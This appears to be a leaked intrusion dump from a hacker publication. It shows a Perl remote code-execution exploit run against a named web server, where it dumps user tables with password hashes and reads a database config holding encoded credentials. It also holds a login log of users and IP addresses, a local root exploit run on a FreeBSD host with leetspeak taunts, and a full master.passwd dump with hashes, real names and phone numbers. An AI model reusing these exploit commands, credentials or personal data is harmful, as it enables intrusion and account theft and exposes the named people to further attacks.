[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Community', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(31) {
["pn_uid"]=>
string(1) "1"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(9) "Anonymous"
["pn_email"]=>
string(0) ""
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(0) ""
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "2"
["pn_name"]=>
string(14) "Bruno Acselrad"
["pn_uname"]=>
string(5) "buchu"
["pn_email"]=>
string(22) "buchu@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(27) "http://www.coresecurity.com"

["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "922ed3056a156d0c2a868ae91c735410"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(7) "Core-v1"
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "3"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(4) "Test"
["pn_email"]=>
string(16) "buchu@corest.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1059683345"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "c6c7b5e75856d69c00449ad9153f541c"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "echo getcwd();"
[*] Sending command echo getcwd();
[*] Command sent, waiting for response
/htdocs/impact
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var')){while((fa
lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../../var')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---run---log---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var/run')){while
((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../../var/run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---mysql---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../run')){while((fa
lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../../run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---mysql---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../')){while((false!==
(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---impact---index.html---oss---impact_devel---impact_new---default---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/')){while((fals
e!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../oss/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---index.html---pcapy---repo---impacket---inlineegg---msyslog---images---projects---index.bk.html---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/')){w
hile((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../oss/impacket/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---LICENSE---ping.py---sniff.py---sniffer.py---split.py---tracer.py---rpcdump.py---samrdump.py---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/LICENS
E')){while((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"

[*] Sending command if($dir=opendir('../oss/impacket/LICENSE')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "readfile('../impact_devel/config.php');"
[*] Sending command readfile('../impact_devel/config.php');
[*] Command sent, waiting for response
<?php
// $Id: config.php,v 1.10 2003/06/29 23:16:24 markwest Exp $
// ----------------------------------------------------------------------
// PostNuke Content Management System
// Copyright (C) 2001 by the PostNuke Development Team.
// http://www.postnuke.com/
// ----------------------------------------------------------------------
// Based on:
// PHP-NUKE Web Portal System - http://phpnuke.org/
// Thatware - http://thatware.org/
// ----------------------------------------------------------------------
// LICENSE
//
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License (GPL)
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// To read the license please visit http://www.gnu.org/copyleft/gpl.html
// ----------------------------------------------------------------------
// Original Author of file: Everyone
// Purpose of file: Configure database
// ----------------------------------------------------------------------

// ----------------------------------------------------------------------
// Database & System Config
//
// dbtype: type of database, currently only mysql
// dbhost: MySQL Database Hostname
// dbuname: MySQL Username
// dbpass: MySQL Password
// dbname: MySQL Database Name
// system: 0 for Unix/Linux, 1 for Windows
// encoded: 0 for MySQL information unenccoded
// 1 for encoded
// ----------------------------------------------------------------------
//
$pnconfig['dbtype'] = 'mysql';
$pnconfig['dbtabletype'] = 'myisam';
$pnconfig['dbhost'] = '127.0.0.1';
$pnconfig['dbuname'] = 'cm9vdA==';
$pnconfig['dbpass'] = 'NzNsaCx4';
$pnconfig['dbname'] = 'Community';
$pnconfig['system'] = '0';
$pnconfig['prefix'] = 'impact';
$pnconfig['encoded'] = '1';

// ----------------------------------------------------------------------
// For debugging (Pablo Roca)
//
// $debug - debugger windows active
// 0 = No
// 1 = Yes
//
// $debug_sql - show SQL in lens debug
// 0 = No
// 1 = Yes
// ----------------------------------------------------------------------
GLOBAL $pndebug;
$pndebug['debug'] = 0;
$pndebug['debug_sql'] = 0;

// ----------------------------------------------------------------------
// You have finished configuring the database. Now you can start to
// change your site settings in the Administration Section.
//
// Thanks for choosing PostNuke.
// ----------------------------------------------------------------------

// ----------------------------------------------------------------------
// if there is a personal_config.php in the folder where is config.php
// we add it. (This HAS to be at the end, after all initialization.)
// ----------------------------------------------------------------------
if (@file_exists("personal_config.php"))
{ include("personal_config.php"); }
// ----------------------------------------------------------------------
// Make config file backwards compatible (deprecated)
// ----------------------------------------------------------------------
extract($pnconfig, EXTR_OVERWRITE);
?>
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../impact_new/')){while((false!==(\$file=readdir(\$dir)))){if(is_writable('../im






  
.146.180.185 Fri Dec 16 13:50 - 13:51 (00:00)
aloke ttyp2 71.132.19.198 Fri Dec 16 10:37 - 18:47 (08:09)
cassiel ttyp6 68.127.162.214 Thu Dec 15 23:09 - 23:11 (00:02)
cassiel ttyp4 68.127.162.214 Thu Dec 15 22:56 - 01:17 (02:20)
gessel ttyp2 66.174.92.162 Thu Dec 15 21:13 - 23:51 (02:37)
dover ttyp3 216.240.45.19 Thu Dec 15 17:28 - 23:51 (3+06:22)
db_cooper ttyp6 24.23.217.85 Thu Dec 15 15:07 - 15:10 (00:02)
enrique ttyp4 70.180.216.196 Thu Dec 15 15:04 - 19:33 (04:29)
gessel ttyp3 208.54.95.129 Thu Dec 15 13:42 - 15:58 (02:16)
aloke ttyp2 71.131.208.119 Thu Dec 15 10:04 - 18:03 (07:58)
gessel ttyp2 66.174.93.98 Thu Dec 15 07:24 - 09:33 (02:08)
gessel ttyp3 208.54.95.129 Thu Dec 15 04:57 - 07:07 (02:10)
gessel ttyp2 208.54.95.129 Thu Dec 15 04:14 - 06:33 (02:19)
ftp ftp 62.57.9.78 Thu Dec 15 00:37 - 00:39 (00:02)
enrique ttyp3 70.180.216.196 Wed Dec 14 23:01 - 02:11 (03:09)
ftp ftp 67.181.74.207 Wed Dec 14 22:50 - 22:52 (00:02)
gessel ttyp2 66.174.92.162 Wed Dec 14 22:24 - 23:44 (01:19)
aloke ttyp2 71.131.235.247 Wed Dec 14 16:34 - 16:53 (00:18)
shipley ttyp0 216.240.45.19 Wed Dec 14 16:01 - 23:51 (4+07:49)
dover ttyp0 216.240.45.19 Wed Dec 14 16:01 - 16:01 (00:00)
bagg ftp 69.107.6.173 Wed Dec 14 14:27 - 14:46 (00:19)
enrique ttyp6 70.180.216.196 Wed Dec 14 13:58 - 15:07 (1+01:09)
ftp ftp 216.240.44.11 Wed Dec 14 13:48 - 13:49 (00:01)
ftp ftp 216.240.44.11 Wed Dec 14 13:43 - 13:43 (00:00)
gessel ttyp4 66.93.181.147 Wed Dec 14 12:07 - 20:23 (08:16)
bifrost ttyp1 209.237.225.2 Wed Dec 14 11:15 - 23:14 (2+11:58)
aloke ttyp0 71.131.226.167 Wed Dec 14 10:32 - 15:42 (05:09)
enrique ttyp0 70.180.216.196 Wed Dec 14 07:23 - 07:39 (00:15)
gessel ttyp4 66.93.181.147 Tue Dec 13 22:27 - 04:53 (06:25)
enrique ttyp1 70.180.216.196 Tue Dec 13 22:04 - 11:15 (13:11)
enrique ttyp4 70.180.216.196 Tue Dec 13 17:46 - 18:48 (01:01)
aloke ttyp1 71.131.226.167 Tue Dec 13 09:30 - 18:15 (08:45)
gessel ttyp1 71.198.45.135 Tue Dec 13 01:40 - 03:51 (02:10)
gessel ttyp4 66.174.93.99 Mon Dec 12 15:26 - 17:24 (01:58)
gessel ttyp4 24.62.5.193 Mon Dec 12 04:22 - 09:16 (04:54)
enrique ttyp1 loraayn.com Mon Dec 12 02:12 - 21:12 (18:59)
gessel ttyp4 66.174.92.164 Sun Dec 11 21:44 - 23:55 (02:10)
gessel ttyp1 70.209.130.27 Sun Dec 11 19:51 - 23:22 (03:30)
gessel ttyp1 71.49.210.30 Sun Dec 11 17:10 - 19:20 (02:10)
enrique ttyp1 67.138.244.8 Sun Dec 11 15:40 - 15:47 (00:07)
enrique ttyp6 70.180.216.196 Sun Dec 11 13:24 - 13:25 (00:00)
enrique ttyp6 oes21.com Sun Dec 11 12:46 - 12:53 (00:07)
aloke ttyp4 71.131.226.167 Sun Dec 11 12:43 - 16:32 (03:49)
enrique ttyp4 pathanfamily.org Sun Dec 11 09:54 - 12:43 (02:48)
gessel ttyp1 71.49.210.30 Sun Dec 11 09:50 - 14:37 (04:47)
db_cooper ttyp1 24.23.217.85 Sun Dec 11 06:25 - 06:27 (00:02)
gessel ttyp4 66.174.92.162 Sat Dec 10 21:53 - 00:16 (02:23)
gessel ttyp5 71.49.210.30 Sat Dec 10 17:04 - 20:14 (03:09)
gessel ttyp4 71.49.210.30 Sat Dec 10 16:51 - 19:01 (02:10)
dover ttyp3 216.240.45.19 Sat Dec 10 11:45 - 15:52 (4+04:06)
shipley ttyp3 69.42.8.15 Sat Dec 10 04:39 - 05:27 (00:48)
shipley ttyp3 69.42.8.15 Sat Dec 10 03:51 - 04:06 (00:14)
enrique ttyp1 70.180.216.196 Sat Dec 10 03:50 - 22:46 (18:55)
enrique ttyp1 67.138.244.8 Sat Dec 10 03:17 - 03:34 (00:17)
gessel ttyp3 71.49.210.30 Fri Dec 9 22:55 - 01:05 (02:10)
shipley ttyp1 69.42.8.15 Fri Dec 9 22:23 - 02:17 (03:54)
gessel ttyp1 66.174.92.163 Fri Dec 9 20:06 - 22:16 (02:10)
shipley ttyp3 69.42.8.15 Fri Dec 9 19:01 - 21:11 (02:10)
shipley ttyp3 69.42.8.15 Fri Dec 9 17:49 - 18:26 (00:36)
shipley ttyp1 69.42.8.15 Fri Dec 9 17:40 - 19:58 (02:18)
enrique ttyp1 70.180.216.196 Fri Dec 9 16:51 - 16:54 (00:02)
enrique ttyp1 70.180.216.196 Fri Dec 9 14:30 - 14:40 (00:09)
gessel ttyp4 71.49.210.30 Fri Dec 9 12:24 - 17:10 (04:45)
aloke ttyp3 71.131.226.167 Fri Dec 9 11:19 - 16:42 (05:23)
aloke ttyp1 71.131.179.62 Fri Dec 9 10:33 - 12:44 (02:10)
gessel ttyp1 66.174.93.101 Thu Dec 8 19:04 - 22:00 (02:55)
aloke ttyp1 71.131.179.62 Thu Dec 8 16:52 - 18:10 (01:18)
shipley ttyp2 216.240.45.19 Thu Dec 8 15:38 - 15:41 (6+00:03)
bifrost ttyp0 209.237.225.2 Thu Dec 8 15:31 - 04:12 (5+12:40)
carla ttyp0 209.133.53.217 Thu Dec 8 14:58 - 14:58 (00:00)
aloke ttyp6 71.131.179.62 Thu Dec 8 10:44 - 14:26 (03:42)
db_cooper ttyp4 24.21.198.181 Thu Dec 8 10:17 - 16:27 (06:09)
gessel ttyp2 71.198.45.135 Thu Dec 8 10:13 - 12:24 (02:10)
aloke ttyp0 71.131.218.189 Thu Dec 8 09:40 - 12:13 (02:33)
db_cooper ttyp2 24.21.198.181 Thu Dec 8 01:33 - 01:34 (00:00)
gessel ttyp0 71.198.45.135 Thu Dec 8 00:55 - 03:55 (02:59)
gessel ttyp0 66.93.181.147 Wed Dec 7 17:28 - 21:23 (03:55)
enrique ttyp2 67.138.244.8 Wed Dec 7 16:42 - 16:44 (00:02)
carla ttyp2 216.132.69.40 Wed Dec 7 15:30 - 15:35 (00:05)
seric ttyp2 seric.com Wed Dec 7 15:11 - 15:12 (00:01)
bitrush ttyp2 66.129.224.36 Wed Dec 7 13:45 - 13:47 (00:01)
enrique ttyp2 70.180.216.196 Wed Dec 7 12:40 - 13:13 (00:32)
aloke ttyp0 71.131.218.189 Wed Dec 7 09:42 - 17:17 (07:35)
db_cooper ttyp2 24.21.198.181 Tue Dec 6 23:58 - 00:01 (00:02)
enrique ttyp0 70.180.216.196 Tue Dec 6 23:58 - 00:01 (00:03)
enrique ttyp4 70.180.216.196 Tue Dec 6 17:23 - 17:41 (00:18)
almus ttyp6 67.180.208.137 Tue Dec 6 16:29 - 16:35 (00:06)
carla ttyp7 209.133.53.217 Tue Dec 6 15:48 - 15:48 (00:00)
bstring ttyp6 4.246.138.254 Tue Dec 6 15:40 - 15:50 (00:09)
dover ttyp5 216.240.45.19 Tue Dec 6 13:02 - 16:11 (2+03:08)
enrique ttyp4 70.180.216.196 Tue Dec 6 12:13 - 17:23 (05:10)
aloke ttyp2 71.131.218.189 Tue Dec 6 09:38 - 18:11 (08:33)
enrique ttyp2 66.235.215.176 Tue Dec 6 06:14 - 06:14 (00:00)
enrique ttyp2 66.235.215.176 Tue Dec 6 06:11 - 06:12 (00:00)
enrique ttyp4 70.180.216.196 Tue Dec 6 05:29 - 05:29 (00:00)
enrique ttyp2 67.138.244.8 Tue Dec 6 05:26 - 05:43 (00:17)
db_cooper ttyp4 24.21.198.181 Tue Dec 6 03:46 - 03:54 (00:08)
shipley ttyp2 69.42.8.15 Tue Dec 6 01:36 - 04:21 (02:44)
shipley ttyp4 69.42.8.15 Mon Dec 5 21:24 - 00:54 (03:29)
shipley ttyp2 69.42.8.15 Mon Dec 5 21:09 - 21:58 (00:49)
carla ttyp2 209.133.53.217 Mon Dec 5 17:16 - 17:17 (00:01)
carla ttyp4 209.133.53.217 Mon Dec 5 15:22 - 15:26 (00:04)
bifrost ttyp3 209.237.225.2 Mon Dec 5 12:37 - 15:13 (3+02:36)
aloke ttyp2 71.131.218.189 Mon Dec 5 10:03 - 17:01 (06:58)
shipley ttyp1 216.240.45.19 Mon Dec 5 09:23 - 16:20 (3+06:57)
gessel ttyp0 66.93.181.156 Mon Dec 5 06:16 - 20:44 (1+14:27)
shipley ttyp1 216.240.45.19 Sun Dec 4 18:53 - 23:44 (04:51)
aloke ttyp0 71.131.218.189 Sun Dec 4 17:46 - 20:37 (02:50)
bifrost ttyp1 209.237.225.2 Sun Dec 4 12:41 - 16:56 (04:14)
aloke ttyp0 71.131.218.189 Sun Dec 4 11:22 - 17:32 (06:10)
gessel ttyp1 66.174.93.100 Sat Dec 3 21:49 - 01:12 (03:22)
enrique ttyp0 70.180.216.196 Sat Dec 3 21:42 - 02:43 (05:00)
shipley ttyp0 216.240.45.19 Sat Dec 3 15:08 - 19:29 (04:21)
enrique ttyp1 70.180.216.196 Sat Dec 3 13:24 - 13:25 (00:00)
gessel ttyp1 71.49.214.235 Sat Dec 3 01:57 - 04:07 (02:10)
gessel ttyp1 66.174.92.162 Fri Dec 2 22:33 - 22:36 (00:03)
dover ttyp0 216.240.45.19 Fri Dec 2 20:36 - 13:35 (16:59)
aloke ttyp1 71.131.218.189 Fri Dec 2 19:04 - 19:25 (00:21)
gessel ttyp3 66.174.79.232 Fri Dec 2 15:10 - 17:22 (02:12)
shipley ttyp2 216.240.45.19 Fri Dec 2 12:51 - 14:35 (1+01:43)
carla ttyp1 www.transbay.net Fri Dec 2 11:55 - 18:16 (06:20)
db_cooper ttyp1 24.21.198.181 Fri Dec 2 09:49 - 10:35 (00:46)
aloke ttyp0 71.131.218.189 Fri Dec 2 09:41 - 19:15 (09:33)
enrique ttyp2 70.180.216.196 Thu Dec 1 22:52 - 22:52 (00:00)
carla ttyp5 209.133.53.217 Thu Dec 1 14:16 - 19:30 (05:14)
carla ttyp5 209.133.53.217 Thu Dec 1 13:45 - 13:47 (00:01)
db_cooper ttyp3 24.21.198.181 Thu Dec 1 13:26 - 12:19 (22:52)
aloke ttyp2 71.131.218.189 Thu Dec 1 10:05 - 19:17 (09:12)
enrique ttyp2 70.180.216.196 Thu Dec 1 09:15 - 09:18 (00:02)

wtmp begins Thu Dec 1 09:15:35 PST 2005
[enrique@kizmiaz] $ uname -a
FreeBSD kizmiaz.dis.org 5.0-DP1 FreeBSD 5.0-DP1 #8: Sat Nov 6 11:46:40 PST 2004 shipley@kizmiaz.dis.org:/usr/src/sys/i386/compile/KIZMIAZ i386


th3 r3zt 1z h1zt0ry.. w3'll k33p sn1ff1ng unt1l sh1pl3y r31nst4llz. h0no
r3sp3ctz g0th1c h1ppy w1r3dr1v13rz 0f 4ll cr33dz. k33p h4q1ng!

[enrique@kizmiaz] $ /tmp/fbsd-0ldd4y\(fl0kk3n\!\!\!\) -p 12:34:23 -f/tmp/targetz
[!] working ................
[!] worked
# cat /etc/master.passwd
#
# master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $
#
#root:$1$guZyyUiO$FF3XGdq9cL3NLQfZ9MVGF/:0:0::0:0:Charlie &:/root:/bin/csh
root:$1$DjE0i2EK$o7NA7p.2bPnv2/sRpt50y1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
sshd:*:22:22::0:0:Ssh User:/var/empty:/sbin/nologin
mailnull:*:26:26::0:0:Sendmail default User:/var/spool/mqueue:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/var/named/var/named:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin
mp3:*:70:70::0:0:MP3 access :/nonexistent:/sbin/nologin
www:*:80:80::0:0:WWW-server:/html/docs:/sbin/nologin
wwws:*:81:81::0:0:Secure WWW-server:/html/docs:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
shipley:$1$R2KJheGJ$2bguyDLKRrLyHKbpLY8UZ.:141:100:staff:0:0:Peter Shipley,Home,,510 849 2230:/home/shipley:/bin/csh
pcguest:*:102:102::0:0:pc guest access:/noexist:/sbin/nologin
brand:*anFuvWN.8ElXk:117:100::0:0::/home/brand:/bin/csh
nathan:$1$1rIkgT0g$oGVRGnGOCsknZ6J.u.nsQ/:118:100::0:0:Nathan Trueblood,,,:/home/nathan:/bin/csh
carla:2gepGyeNUYU82:126:100::0:0:Carla ?,,,:/home/carla:/bin/csh
stryder:*Pg3L4cgZ46Dmg:203:100::0:0:Evil Stryder ,,,:/home/stryder:/bin/sh
zac:snLErblZEentg:248:100::0:0:Evil Zac Franken,,,:/home/zac:/bin/sh
daver:rH50FjjPutxvQ:254:100::0:0:Evil Dave,Hell,32,32:/home/daver:/bin/csh
aloke:$1$eaURFYnM$yI1nA0YdKfv9PBBzbN3381:315:315::0:0:Minister of Information:/home/aloke:/bin/csh
matt:$1$OXoVUufN$8VufM8hWgrQSAGc.dLN/10:1003:1003::0:0:matt:/home/matt:/bin/csh
afr:loFmUBjIdTLA2:1004:1004::0:0:aFR:/home/afr:/bin/tcsh
george:*cdUZbnGNFxntY:1005:100::0:0:,,,:/home/george:/bin/csh
heather:dZWlj0q0JGH.Y:1009:100::0:0:heather,,,:/home/heather:/bin/csh
lwpowers:BKYTlfGTgFZsU:1010:100::0:0:Brook Powers,,,:/home/lwpowers:/bin/csh
gessel:$1$S7OOur.H$Vdtn7SbJjNONegb1oY.gl.:1011:100::0:0:,\,,:/home/gessel:/bin/csh
julian:$1$aVAZkTMb$.aCpLZoV4PXWY92s7a7SM0:1015:1015::0:0:Julian Elischer:/home/julian:/bin/csh
warbot:PMpeKV.bg.94w:1016:100::0:0:Wilhemina Arbot,,,:/home/warbot:/bin/csh
nik:*4993EExQcslz2:1017:0::0:0:JoBob Briggs,back 40,nope,yeah right:/home/nik:/bin/csh
harold:cYfwINEWvyJ9A:1019:1019::0:0:Harold Benson,,,:/home/harold:/bin/tcsh
damon:$1$vo1WW7mC$rru3U9qNBgYdqSK3wnSii1:1020:1020::0:0:Damon,,,:/home/damon:/bin/csh
ioscream:33b3ytRixtGWI:1023:1023::0:0:,,,:/home/ioscream:/bin/csh
parmalac:31HUCdyL3/n9c:1024:1024::0:0:,,,:/home/parmalac:/bin/csh
complink:30RncUnzOAuro:1025:1025::0:0:Computer Link Access Account,,,:/home/complink:/bin/csh
expert:M6AmCQ8dheLpY:1026:1026::0:0:,,,:/home/expert:/bin/csh
sarex:VEUZBMxeee6do:1031:1031::0:0:SareX,,,:/home/sarex:/bin/sh
bifrost:9kEey0WTcbUTo:1033:1033::0:0:Evil Bifrost,,,:/home/bifrost:/bin/csh
walkabout:fFDg4c4uPWmug:1034:1034::0:0:,,,:/home/walkabout:/bin/csh
mkb:$1$4xlruvZb$Jbb.Lk6dYZmFK7VFj1Ln50:1036:1036::0:0:Mike Brodhead,Area 51,,510-547-8365:/home/mkb:/bin/tcsh
almus:$1$NdB6m002$tNkmnz8TKT1HukE2WDcqC0:1037:1037::0:0:,,,:/home/almus:/bin/csh
simsong:91OMf13jwRcLE:1039:1039::0:0:Simson L. Garfinkel,,,:/home/simsong:/bin/tcsh
nhd:*DO/goYCqTG97k:1041:1041::0:0:NetWork Hacking Device,,,:/home/nhd:/bin/csh
cimarron:qsj1oXEAQpj.Y:1042:100::0:0:Cim,,,:/home/cimarron:/bin/csh
clay:271Z48qykIt.Y:1044:100::0:0:Clay Bain:/noexist:/bin/csh
bstring:$1$MErxOH4k$AgxgvUlV2ovn2TrAuWVl11:1045:1045::0:0:,,,:/home/bstring:/bin/sh
crack:*:1046:1046::0:0:,,,:/home/crack:/bin/csh
bishopj:18l9gWyVY3GN.:1049:100::0:0:bishop joey,,,:/home/bishopj:/bin/csh
milk:21Ym5Z0c.3ECU:1051:100::0:0:,,,:/home/milk:/bin/csh
dc:UAUGsKxB1brhQ:1053:100::0:0:,,,:/home/dc:/bin/csh
rsi:38PAyBrrWp9lE:1054:100::0:0:,,,:/home/rsi:/bin/sh
karen:aaMxwpoq7.WEg:1055:100::0:0:,,,:/home/karen:/bin/csh
seric:$1$EY2/M2n9$H2KODMGJhzWvo6B1/tUXM.:1056:1056::0:0:Evil Seric,,,:/home/seric:/bin/csh
gruby:*15oNDd9zBeK/6:1057:100::0:0:Evil Gene,,,:/home/gruby:/bin/csh
lagger:33Witv7rDBu0A:1058:100::0:0:Evil Wiesen,,,:/home/lagger:/bin/csh
wk:h2Ln.BKOOHdzw:1059:1059::0:0:William Knowles,,,:/home/wk:/bin/csh
metaxis:82q/Sk8hrPkCU:1060:1060::0:0:Ginny Tonic,I have an office?,(800)777-9388,:/home/metaxis:/bin/tcsh
cb:*BADDPASS*47a0k4u6c4nOk:1061:100::0:0:,,,:/home/cb:/bin/csh
dave:54IoU3DuBh3mM:1062:100::0:0:,,,:/home/dave:/bin/csh
khti:$1$yW6Pje7m$83kTpXwBUT/ZGg9hkFE3Y1:1063:100::0:0:,,,,:/home/khti:/bin/csh
smishey:kh/Ds0sgYe4Go:1064:1064::0:0:,,,:/home/smishey:/bin/csh
chs:INprg2hN9oD4Y:1065:1065::0:0:Christian Hedegaard-Schou I,,,:/home/chs:/bin/sh
v1ru5:$1$u3HZgPYI$dfyYtZV6YsAKP30.RYd8i1:1066:1066::0:0:v1ru5,,,:/home/v1ru5:/bin/csh
tpete:64/2.I/8snal.:1068:1068::0:0:Tracy Peterson,www.ninthhouse.com,,:/home/tpete:/bin/csh
cal:$1$2gHc8mUr$FNxZU6f0s5F0tx7Y1oomf0:1069:1069::0:0:Cal:/home/cal:/bin/csh
wireman:MXgnyrWJ3zWSk:1070:1070::0:0:,,,:/home/wireman:/bin/csh
shatter:$1$HjznUxQw$rGklAs6vJ/3VHGGJL46Bk0:1071:1071::0:0:,,,:/home/shatter:/bin/csh
rc5des:*:1072:1072::0:0:RC5 challenge uid,,,:/home/rc5des:/bin/csh
punkis:nRaqbZqhjvPx6:1074:1074::0:0:punkis ,,,:/home/punkis:/bin/sh
comega:49J3tfn.z0zPs:1075:1075::0:0:Cancer Omega,Southern California,,:/home/comega:/bin/sh
gh0st:DSERHoVkG3Rq.:1076:1076::0:0:,,,:/home/gh0st:/bin/csh
mrmojo:$1$FKehTNKV$AwFXg80mj6yD1rKBSMOG/0:1078:1078::0:0:Mr. Mojo,,,:/home/mrmojo:/bin/csh
bailey:t7BNiuBSu35uQ:1080:1080::0:0:Evil bailey,,,:/home/bailey:/bin/csh
mentat:25yQFKq9R4BMY:1081:1081::0:0:,,,:/home/mentat:/bin/csh
spork:kYT8kaRCxWCP6:1082:100::0:0:spork :/home/spork:/usr/local/bin/bash
